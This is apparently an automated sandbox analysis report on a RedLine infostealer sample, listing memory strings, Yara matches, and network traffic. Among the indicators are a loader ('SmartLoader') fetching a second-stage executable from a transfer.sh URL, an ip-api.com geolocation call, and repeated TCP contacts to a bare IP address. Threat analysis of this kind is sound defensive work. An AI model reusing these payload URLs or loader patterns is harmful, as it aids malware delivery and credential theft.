Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responseon
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responseon
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4y/
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/yAEPpl/gggge.exe
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/yAEPpl/gggge.exe4
Source: RegSvcs.exe, 00000006.00000002.531533948.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/yAEPpl/gggge.exeadqNf
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: 1JCAVkYU3U.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 123.exe, 123.exe, 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp, RegSvcs.exe, 00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: RegSvcs.exe, 00000006.00000002.543163037.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.538488155.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, re.exe.6.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/yAEPpl/gggge.exe
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/yAEPpl/gggge.exe5
Source: RegSvcs.exe, 00000006.00000002.535657163.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/yAEPpl/gggge.exeplf
Source: RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/yAEPpl/gggge.exesh9
Source: 1JCAVkYU3U.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic	HTTP traffic detected: GET /get/yAEPpl/gggge.exe HTTP/1.1User-Agent: SmartLoaderHost: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: SmartLoaderHost: ip-api.com
Source: global traffic	HTTP traffic detected: GET /get/yAEPpl/gggge.exe HTTP/1.1Content-Type: application/jsonUser-Agent: SmartLoaderHost: transfer.sh

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.252.73.140

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49714 version: TLS 1.2

Source: 321.exe, 00000002.00000002.280323574.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.3.123.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.1c3a80.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.1c3a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.123.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Windows\Temp\123.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 232

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6848E	0_2_00B6848E
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B76CDC	0_2_00B76CDC
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B700B7	0_2_00B700B7
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B74088	0_2_00B74088
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B640FE	0_2_00B640FE
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B851C9	0_2_00B851C9
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B77153	0_2_00B77153
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B632F7	0_2_00B632F7
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B762CA	0_2_00B762CA
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B743BF	0_2_00B743BF
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6C426	0_2_00B6C426
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6F461	0_2_00B6F461
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B8D440	0_2_00B8D440
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B777EF	0_2_00B777EF
